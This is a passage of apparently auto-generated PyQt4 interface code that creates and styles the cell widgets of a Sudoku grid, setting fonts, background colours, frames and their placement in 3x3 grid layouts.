self.label_0_5.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_0_5.setFont(font)
self.label_0_5.setAutoFillBackground(False)
self.label_0_5.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_0_5.setFrameShape(QtGui.QFrame.Panel)
self.label_0_5.setText(_fromUtf8(""))
self.label_0_5.setTextFormat(QtCore.Qt.PlainText)
self.label_0_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_0_5.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_0_5.setObjectName(_fromUtf8("label_0_5"))
self.gridLayout_2.addWidget(self.label_0_5, 0, 2, 1, 1)
self.label_2_4 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2_4.sizePolicy().hasHeightForWidth())
self.label_2_4.setSizePolicy(sizePolicy)
self.label_2_4.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_2_4.setFont(font)
self.label_2_4.setAutoFillBackground(False)
self.label_2_4.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_2_4.setFrameShape(QtGui.QFrame.Panel)
self.label_2_4.setText(_fromUtf8(""))
self.label_2_4.setTextFormat(QtCore.Qt.PlainText)
self.label_2_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_2_4.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_2_4.setObjectName(_fromUtf8("label_2_4"))
self.gridLayout_2.addWidget(self.label_2_4, 2, 1, 1, 1)
self.label_0_3 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_0_3.sizePolicy().hasHeightForWidth())
self.label_0_3.setSizePolicy(sizePolicy)
self.label_0_3.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_0_3.setFont(font)
self.label_0_3.setAutoFillBackground(False)
self.label_0_3.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_0_3.setFrameShape(QtGui.QFrame.Panel)
self.label_0_3.setLineWidth(1)
self.label_0_3.setText(_fromUtf8(""))
self.label_0_3.setTextFormat(QtCore.Qt.PlainText)
self.label_0_3.setScaledContents(False)
self.label_0_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_0_3.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_0_3.setObjectName(_fromUtf8("label_0_3"))
self.gridLayout_2.addWidget(self.label_0_3, 0, 0, 1, 1)
self.label_2_5 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2_5.sizePolicy().hasHeightForWidth())
self.label_2_5.setSizePolicy(sizePolicy)
self.label_2_5.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_2_5.setFont(font)
self.label_2_5.setAutoFillBackground(False)
self.label_2_5.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_2_5.setFrameShape(QtGui.QFrame.Panel)
self.label_2_5.setText(_fromUtf8(""))
self.label_2_5.setTextFormat(QtCore.Qt.PlainText)
self.label_2_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_2_5.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_2_5.setObjectName(_fromUtf8("label_2_5"))
self.gridLayout_2.addWidget(self.label_2_5, 2, 2, 1, 1)
self.mainGridLayout.addLayout(self.gridLayout_2, 0, 1, 1, 1)
self.gridLayout_6 = QtGui.QGridLayout()
self.gridLayout_6.setSpacing(0)
self.gridLayout_6.setObjectName(_fromUtf8("gridLayout_6"))
self.label_3_7 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_3_7.sizePolicy().hasHeightForWidth())
self.label_3_7.setSizePolicy(sizePolicy)
self.label_3_7.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_3_7.setFont(font)
self.label_3_7.setAutoFillBackground(False)
self.label_3_7.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_3_7.setFrameShape(QtGui.QFrame.Panel)
self.label_3_7.setFrameShadow(QtGui.QFrame.Plain)
self.label_3_7.setText(_fromUtf8(""))
self.label_3_7.setTextFormat(QtCore.Qt.PlainText)
self.label_3_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_3_7.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_3_7.setObjectName(_fromUtf8("label_3_7"))
self.gridLayout_6.addWidget(self.label_3_7, 0, 1, 1, 1)
self.label_4_6 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_4_6.sizePolicy().hasHeightForWidth())
self.label_4_6.setSizePolicy(sizePolicy)
self.label_4_6.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_4_6.setFont(font)
self.label_4_6.setAutoFillBackground(False)
self.label_4_6.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_4_6.setFrameShape(QtGui.QFrame.Panel)
self.label_4_6.setText(_fromUtf8(""))
self.label_4_6.setTextFormat(QtCore.Qt.PlainText)
self.label_4_6.setAlignment(QtCore.Qt.AlignCenter)
self.label_4_6.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_4_6.setObjectName(_fromUtf8("label_4_6"))
self.gridLayout_6.addWidget(self.label_4_6, 1, 0, 1, 1)
self.label_3_6 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_3_6.sizePolicy().hasHeightForWidth())
self.label_3_6.setSizePolicy(sizePolicy)
self.label_3_6.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_3_6.setFont(font)
self.label_3_6.setAutoFillBackground(False)
self.label_3_6.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_3_6.setFrameShape(QtGui.QFrame.Panel)
self.label_3_6.setLineWidth(1)
self.label_3_6.setText(_fromUtf8(""))
self.label_3_6.setTextFormat(QtCore.Qt.PlainText)
self.label_3_6.setScaledContents(False)
self.label_3_6.setAlignment(QtCore.Qt.AlignCenter)
self.label_3_6.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_3_6.setObjectName(_fromUtf8("label_3_6"))
self.gridLayout_6.addWidget(self.label_3_6, 0, 0, 1, 1)
self.label_4_8 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_4_8.sizePolicy().hasHeightForWidth())
self.label_4_8.setSizePolicy(sizePolicy)
self.label_4_8.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_4_8.setFont(font)
self.label_4_8.setAutoFillBackground(False)
self.label_4_8.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_4_8.setFrameShape(QtGui.QFrame.Panel)
self.label_4_8.setText(_fromUtf8(""))
self.label_4_8.setTextFormat(QtCore.Qt.PlainText)
self.label_4_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_4_8.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_4_8.setObjectName(_fromUtf8("label_4_8"))
self.gridLayout_6.addWidget(self.label_4_8, 1, 2, 1, 1)
self.label_5_8 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_5_8.sizePolicy().hasHeightForWidth())
self.label_5_8.setSizePolicy(sizePolicy)
self.label_5_8.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_5_8.setFont(font)
self.label_5_8.setAutoFillBackground(False)
self.label_5_8.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_5_8.setFrameShape(QtGui.QFrame.Panel)
self.label_5_8.setText(_fromUtf8(""))
self.label_5_8.setTextFormat(QtCore.Qt.PlainText)
self.label_5_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_5_8.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_5_8.setObjectName(_fromUtf8("label_5_8"))
self.gridLayout_6.addWidget(self.label_5_8, 2, 2, 1, 1)
self.label_5_7 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_5_7.sizePolicy().hasHeightForWidth())
self.label_5_7.setSizePolicy(sizePolicy)
self.label_5_7.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_5_7.setFont(font)
self.label_5_7.setAutoFillBackground(False)
self.label_5_7.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_5_7.setFrameShape(QtGui.QFrame.Panel)
self.label_5_7.setText(_fromUtf8(""))
self.label_5_7.setTextFormat(QtCore.Qt.PlainText)
self.label_5_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_5_7.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_5_7.setObjectName(_fromUtf8("label_5_7"))
self.gridLayout_6.addWidget(self.label_5_7, 2, 1, 1, 1)
self.label_3_8 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_3_8.sizePolicy().hasHeightForWidth())
self.label_3_8.setSizePolicy(sizePolicy)
self.label_3_8.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_3_8.setFont(font)
self.label_3_8.setAutoFillBackground(False)
self.label_3_8.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_3_8.setFrameShape(QtGui.QFrame.Panel)
self.label_3_8.setText(_fromUtf8(""))
self.label_3_8.setTextFormat(QtCore.Qt.PlainText)
self.label_3_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_3_8.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_3_8.setObjectName(_fromUtf8("label_3_8"))
self.gridLayout_6.addWidget(self.label_3_8, 0, 2, 1, 1)
self.label_5_6 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_5_6.sizePolicy().hasHeightForWidth())
self.label_5_6.setSizePolicy(sizePolicy)
self.label_5_6.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_5_6.setFont(font)
self.label_5_6.setAutoFillBackground(False)
self.label_5_6.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_5_6.setFrameShape(QtGui.QFrame.Panel)
self.label_5_6.setText(_fromUtf8(""))
self.label_5_6.setTextFormat(QtCore.Qt.PlainText)
self.label_5_6.setAlignment(QtCore.Qt.AlignCenter)
self.label_5_6.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_5_6.setObjectName(_fromUtf8("label_5_6"))
self.gridLayout_6.addWidget(self.label_5_6, 2, 0, 1, 1)
self.label_4_7 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_4_7.sizePolicy().hasHeightForWidth())
self.label_4_7.setSizePolicy(sizePolicy)
self.label_4_7.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_4_7.setFont(font)
self.label_4_7.setAutoFillBackground(False)
self.label_4_7.setStyleSheet(_fromUtf8("background-color: rgb(255, 255, 255);"))
self.label_4_7.setFrameShape(QtGui.QFrame.Panel)
self.label_4_7.setText(_fromUtf8(""))
self.label_4_7.setTextFormat(QtCore.Qt.PlainText)
self.label_4_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_4_7.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_4_7.setObjectName(_fromUtf8("label_4_7"))
self.gridLayout_6.addWidget(self.label_4_7, 1, 1, 1, 1)
self.mainGridLayout.addLayout(self.gridLayout_6, 1, 2, 1, 1)
self.gridLayout_7 = QtGui.QGridLayout()
self.gridLayout_7.setSpacing(0)
self.gridLayout_7.setObjectName(_fromUtf8("gridLayout_7"))
self.label_6_2 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_6_2.sizePolicy().hasHeightForWidth())
self.label_6_2.setSizePolicy(sizePolicy)
self.label_6_2.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_6_2.setFont(font)
self.label_6_2.setAutoFillBackground(False)
self.label_6_2.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_6_2.setFrameShape(QtGui.QFrame.Panel)
self.label_6_2.setText(_fromUtf8(""))
self.label_6_2.setTextFormat(QtCore.Qt.PlainText)
self.label_6_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_6_2.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_6_2.setObjectName(_fromUtf8("label_6_2"))
self.gridLayout_7.addWidget(self.label_6_2, 0, 2, 1, 1)
self.label_7_2 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_7_2.sizePolicy().hasHeightForWidth())
self.label_7_2.setSizePolicy(sizePolicy)
self.label_7_2.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_7_2.setFont(font)
self.label_7_2.setAutoFillBackground(False)
self.label_7_2.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_7_2.setFrameShape(QtGui.QFrame.Panel)
self.label_7_2.setText(_fromUtf8(""))
self.label_7_2.setTextFormat(QtCore.Qt.PlainText)
self.label_7_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_7_2.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_7_2.setObjectName(_fromUtf8("label_7_2"))
self.gridLayout_7.addWidget(self.label_7_2, 1, 2, 1, 1)
self.label_7_1 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_7_1.sizePolicy().hasHeightForWidth())
self.label_7_1.setSizePolicy(sizePolicy)
self.label_7_1.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_7_1.setFont(font)
self.label_7_1.setAutoFillBackground(False)
self.label_7_1.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_7_1.setFrameShape(QtGui.QFrame.Panel)
self.label_7_1.setText(_fromUtf8(""))
self.label_7_1.setTextFormat(QtCore.Qt.PlainText)
self.label_7_1.setAlignment(QtCore.Qt.AlignCenter)
self.label_7_1.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_7_1.setObjectName(_fromUtf8("label_7_1"))
self.gridLayout_7.addWidget(self.label_7_1, 1, 1, 1, 1)
self.label_7_0 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_7_0.sizePolicy().hasHeightForWidth())
self.label_7_0.setSizePolicy(sizePolicy)
self.label_7_0.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_7_0.setFont(font)
self.label_7_0.setAutoFillBackground(False)
self.label_7_0.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_7_0.setFrameShape(QtGui.QFrame.Panel)
self.label_7_0.setText(_fromUtf8(""))
self.label_7_0.setTextFormat(QtCore.Qt.PlainText)
self.label_7_0.setAlignment(QtCore.Qt.AlignCenter)
self.label_7_0.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_7_0.setObjectName(_fromUtf8("label_7_0"))
self.gridLayout_7.addWidget(self.label_7_0, 1, 0, 1, 1)
self.label_6_0 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_6_0.sizePolicy().hasHeightForWidth())
self.label_6_0.setSizePolicy(sizePolicy)
self.label_6_0.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_6_0.setFont(font)
self.label_6_0.setAutoFillBackground(False)
self.label_6_0.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_6_0.setFrameShape(QtGui.QFrame.Panel)
self.label_6_0.setLineWidth(1)
self.label_6_0.setText(_fromUtf8(""))
self.label_6_0.setTextFormat(QtCore.Qt.PlainText)
self.label_6_0.setScaledContents(False)
self.label_6_0.setAlignment(QtCore.Qt.AlignCenter)
self.label_6_0.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_6_0.setObjectName(_fromUtf8("label_6_0"))
self.gridLayout_7.addWidget(self.label_6_0, 0, 0, 1, 1)
self.label_8_0 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_8_0.sizePolicy().hasHeightForWidth())
self.label_8_0.setSizePolicy(sizePolicy)
self.label_8_0.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_8_0.setFont(font)
self.label_8_0.setAutoFillBackground(False)
self.label_8_0.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_8_0.setFrameShape(QtGui.QFrame.Panel)
self.label_8_0.setText(_fromUtf8(""))
self.label_8_0.setTextFormat(QtCore.Qt.PlainText)
self.label_8_0.setAlignment(QtCore.Qt.AlignCenter)
self.label_8_0.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_8_0.setObjectName(_fromUtf8("label_8_0"))
self.gridLayout_7.addWidget(self.label_8_0, 2, 0, 1, 1)
self.label_8_2 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_8_2.sizePolicy().hasHeightForWidth())
self.label_8_2.setSizePolicy(sizePolicy)
self.label_8_2.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_8_2.setFont(font)
self.label_8_2.setAutoFillBackground(False)
self.label_8_2.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_8_2.setFrameShape(QtGui.QFrame.Panel)
self.label_8_2.setText(_fromUtf8(""))
self.label_8_2.setTextFormat(QtCore.Qt.PlainText)
self.label_8_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_8_2.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_8_2.setObjectName(_fromUtf8("label_8_2"))
self.gridLayout_7.addWidget(self.label_8_2, 2, 2, 1, 1)
self.label_8_1 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_8_1.sizePolicy().hasHeightForWidth())
self.label_8_1.setSizePolicy(sizePolicy)
self.label_8_1.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_8_1.setFont(font)
self.label_8_1.setAutoFillBackground(False)
self.label_8_1.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_8_1.setFrameShape(QtGui.QFrame.Panel)
self.label_8_1.setText(_fromUtf8(""))
self.label_8_1.setTextFormat(QtCore.Qt.PlainText)
self.label_8_1.setAlignment(QtCore.Qt.AlignCenter)
self.label_8_1.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_8_1.setObjectName(_fromUtf8("label_8_1"))
self.gridLayout_7.addWidget(self.label_8_1, 2, 1, 1, 1)
self.label_6_1 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_6_1.sizePolicy().hasHeightForWidth())
self.label_6_1.setSizePolicy(sizePolicy)
self.label_6_1.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_6_1.setFont(font)
self.label_6_1.setAutoFillBackground(False)
self.label_6_1.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_6_1.setFrameShape(QtGui.QFrame.Panel)
self.label_6_1.setFrameShadow(QtGui.QFrame.Plain)
self.label_6_1.setText(_fromUtf8(""))
self.label_6_1.setTextFormat(QtCore.Qt.PlainText)
self.label_6_1.setAlignment(QtCore.Qt.AlignCenter)
self.label_6_1.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_6_1.setObjectName(_fromUtf8("label_6_1"))
self.gridLayout_7.addWidget(self.label_6_1, 0, 1, 1, 1)
self.mainGridLayout.addLayout(self.gridLayout_7, 2, 0, 1, 1)
self.gridLayout_1 = QtGui.QGridLayout()
self.gridLayout_1.setSpacing(0)
self.gridLayout_1.setObjectName(_fromUtf8("gridLayout_1"))
self.label_0_0 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_0_0.sizePolicy().hasHeightForWidth())
self.label_0_0.setSizePolicy(sizePolicy)
self.label_0_0.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_0_0.setFont(font)
self.label_0_0.setAutoFillBackground(False)
self.label_0_0.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_0_0.setFrameShape(QtGui.QFrame.Panel)
self.label_0_0.setLineWidth(1)
self.label_0_0.setText(_fromUtf8(""))
self.label_0_0.setTextFormat(QtCore.Qt.PlainText)
self.label_0_0.setScaledContents(False)
self.label_0_0.setAlignment(QtCore.Qt.AlignCenter)
self.label_0_0.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_0_0.setObjectName(_fromUtf8("label_0_0"))
self.gridLayout_1.addWidget(self.label_0_0, 0, 0, 1, 1)
self.label_2_2 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2_2.sizePolicy().hasHeightForWidth())
self.label_2_2.setSizePolicy(sizePolicy)
self.label_2_2.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_2_2.setFont(font)
self.label_2_2.setAutoFillBackground(False)
self.label_2_2.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_2_2.setFrameShape(QtGui.QFrame.Panel)
self.label_2_2.setText(_fromUtf8(""))
self.label_2_2.setTextFormat(QtCore.Qt.PlainText)
self.label_2_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_2_2.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_2_2.setObjectName(_fromUtf8("label_2_2"))
self.gridLayout_1.addWidget(self.label_2_2, 2, 2, 1, 1)
self.label_1_0 = SudokuCell(self.sudokugrid)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_1_0.sizePolicy().hasHeightForWidth())
self.label_1_0.setSizePolicy(sizePolicy)
self.label_1_0.setSizeIncrement(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(24)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label_1_0.setFont(font)
self.label_1_0.setAutoFillBackground(False)
self.label_1_0.setStyleSheet(_fromUtf8("background-color: rgb(215, 235, 203);"))
self.label_1_0.setFrameShape(QtGui.QFrame.Panel)
self.label_1_0.setText(_fromUtf8(""))
self.label_1_0.setTextFormat(QtCore.Qt.PlainText)
self.label_1_0.setAlignment(QtCore.Qt.AlignCenter)
self.label_1_0.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
